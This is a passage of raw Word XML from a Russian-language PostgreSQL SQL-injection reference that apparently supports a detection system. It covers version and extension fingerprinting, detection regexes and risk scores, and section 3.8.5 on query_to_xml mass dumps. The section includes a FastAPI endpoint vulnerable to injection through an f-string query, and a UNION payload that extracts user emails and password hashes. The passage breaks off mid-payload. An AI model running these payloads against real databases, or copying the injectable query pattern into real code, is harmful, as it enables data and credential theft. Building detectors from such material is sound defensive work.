          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic_library_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, путь к unix socket с авторизацией), но для всего списка из Payload B — всё видно PUBLIC.</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current_setting('name')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функция-обёртка над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с одним аргументом для не-существующей настройки падает с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">unrecognized configuration parameter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, для существующей — возвращает текстовое значение. Двухаргументная форма </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">current_setting(name, missing_ok)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG 9.6+) с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">missing_ok=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает NULL вместо ошибки — полезно при разведке кастомных GUC от расширений.</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 обычная таблица в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SELECT выдан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То же для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_available_extensions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (view над файловой системой).</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inet_server_addr()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inet_server_port()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pg_postmaster_start_time()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — built-in, без специальных прав. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_postmaster_start_time()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> показывает uptime → если кластер не рестартовался полгода, ни один minor-patch не применён (PG требует restart для апгрейда).</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PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14–17.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стабильны с 9.x; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">current_setting(name, missing_ok)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — PG 9.6+; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">server_version_num</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — PG 8.2+.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 требуются.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на всё. См. таблицу в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.0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Конфиги GUC:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> работает при любых дефолтах. На managed настройки могут показывать masked значения для специфичных параметров (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cloudsql.iam_authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), но 90% списка из Payload B виден.</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 легитимно используется healthcheck-эндпоинтами приложения, миграторами (Alembic проверяет min-version), CI-скриптами.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от application-роли — норма. Атака —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через UNION в payload-е, попадающий в логи как часть SELECT-а с несогласованными типами (например, в response WHERE для текстового поля приходит timestamp).</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 то же. Легитимные читатели: миграторы, мониторинг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опрашивается каждые 30s/1m metric-агентами), DBA-инспекторы. Атака — конкретные WHERE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE name IN ('hba_file', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (комбинация имён конфиг-файлов и SSL-путей — отпечаток recon, не мониторинга).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 миграторы при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE EXTENSION IF NOT EXISTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сначала читают (Alembic, Flyway). Атака — широкая выборка без WHERE, особенно с JOIN на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Маркер атаки в нормализованном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$1, name || $2 || setting, now() FROM pg_settings WHERE name IN ($3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — характерный отпечаток Payload B (множественные литералы в IN, конкатенация name + setting).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current_setting('is_superuser')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от application-роли — однозначно подозрительно: код приложения не должен проверять, является ли его роль superuser-ом (если есть такая проверка — это или escalation-detection в самом приложении, или recon атакующего).</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14–17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в полном объёме.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все три payload-а работают везде (RDS, Cloud SQL, Supabase). Что меняется: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показывает кастомный suffix провайдера: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">... (Ubuntu 16.4-1.pgdg22.04+1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → стандарт; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">... (Debian 16.4-1.pgdg+1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → стандарт; кастом-сборки RDS (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">16.4-rds-...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) и Cloud SQL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">16.4-google-...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — fingerprint провайдера сразу.</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 частично masked (специфичные GUC провайдеров часто скрыты для не-superuser; например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cloudsql.*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> параметры).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 преинсталлированный набор каждого провайдера известен заранее (RDS — большой список включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">aws_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, Cloud SQL — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cloudsql_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, Supabase — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_graphql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pgsodium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vault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Карта установленных extension даёт мгновенный fingerprint, какой провайдер хостит инстанс.</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Детально по провайдерам —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3.8.1, 3.8.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — после fingerprinting атакующий идёт за картой схемы. 3.8.4 обычно первый, потому что версия меняет последующие payload-ы.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из Payload C напрямую определяет, какие OOB-каналы открыты.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из Payload C определяет, доступны ли plperlu/plpython3u/plsh для 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current_setting('is_superuser')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — проверка успешности эскалации между шагами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Раздел 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server_version_num</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> из Payload B — ключ к таблицам версий из 4.6. Каждая CVE в разделе 4 имеет диапазон затрагиваемых </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">server_version_num</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; атакующий пишет lookup-таблицу версия→CVE сам, документ даёт основу.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без других сигналов сложно классифицировать как атаку (легитимные use case многочисленны).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добавить в regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">METADATA_RECON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.8.1) низкоприоритетную ветку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">version\(\)|pg_settings|pg_extension</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risk_score = 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (informational); решающий сигнал — комбинация с UNION, конкатенацией или JOIN на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Логику комбинации — не в rule-based слое, а в LLM-судье. Сводный regex для всей категории 3.8 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.8.md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Information Functions — version() / current_setting()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Views — pg_settings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Catalogs — pg_extension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Catalogs — pg_available_extensions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Source: src/include/pg_config.h.in — PG_VERSION constants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fingerprinting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version &amp; enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.5 query_to_xml, table_to_xml, database_to_xml — массовый дамп одним вызовом</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query_to_xml(text, bool, bool, text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — встроенная функция: принимает произвольный SQL-текст, выполняет его и возвращает результат сериализованным в XML. Один вызов = весь результат запроса в одной строке XML. Аналогичные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">table_to_xml('schema.tbl'::regclass, ...)</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дампят таблицу или всю БД, к которой у роли есть SELECT. Для атакующего это означает: где обычная UNION-инъекция требует подбора количества колонок и итеративного перебора строк (3.1), один вызов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через UNION возвращает всю выборку как одно текстовое значение — без подбора структуры, без chunked-эксфильтрации.</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app/api/v1/catalog.py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@router.get("/catalog")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_items(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    section: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f"SELECT id, sku, price FROM items WHERE section = '{section}'"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Три колонки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numeric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). XML-результат уйдёт в среднюю колонку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sku</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (тип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 `query_to_xml` с произвольным SELECT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `section`):</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query_to_xml('SELECT id, email, password_hash FROM users LIMIT 50', true, false, '')::text, 0 --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sku, price FROM items WHERE section = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query_to_xml(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        'SELECT id, email, password_hash FROM users LIMIT 50',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        true, false, ''</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
